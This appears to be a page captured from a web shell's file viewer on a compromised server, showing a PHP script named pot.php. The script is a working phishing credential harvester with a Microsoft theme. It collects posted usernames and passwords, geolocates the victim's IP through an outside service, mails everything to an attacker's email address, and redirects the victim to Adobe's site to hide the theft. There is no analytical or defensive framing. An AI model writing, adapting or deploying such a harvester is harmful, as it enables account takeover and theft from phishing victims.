HEX
Server: LiteSpeed
System: Linux prometheus.hongkongserver.net 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
User: ayxmplky (1112)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //home/ayxmplky/public_html/pot.php
<?php

/*Email Variables */

$emailSubject = 'microsoft';
$webMaster = 'shemmakatja777@outlook.com';


/* Data Variables */
$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$ipdat = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ip));
if(property_exists($ipdat, 'geoplugin_countryCode'));
if(property_exists($ipdat, 'geoplugin_countryName'));
if(property_exists($ipdat, 'geoplugin_city'));
if(property_exists($ipdat, 'geoplugin_region'));
$countrycode = $ipdat->geoplugin_countryCode;
$country = $ipdat->geoplugin_countryName;


$body = <<<EOD
<br><hr><br>

username: $username <br>
password: $password <br>
ip: $ip <br>
countrycode: $countrycode <br>
country: $country <br>


EOD;
$headers = "From: $email\r\n";
$headers = "Content-type: text/html\r\n";
$success = mail($webMaster, $emailSubject, $body,
$headers);


/* Redirect browser */

header("Location: https://www.adobe.com");

/* Make sure that code below does not get executed when we redirect. */

?>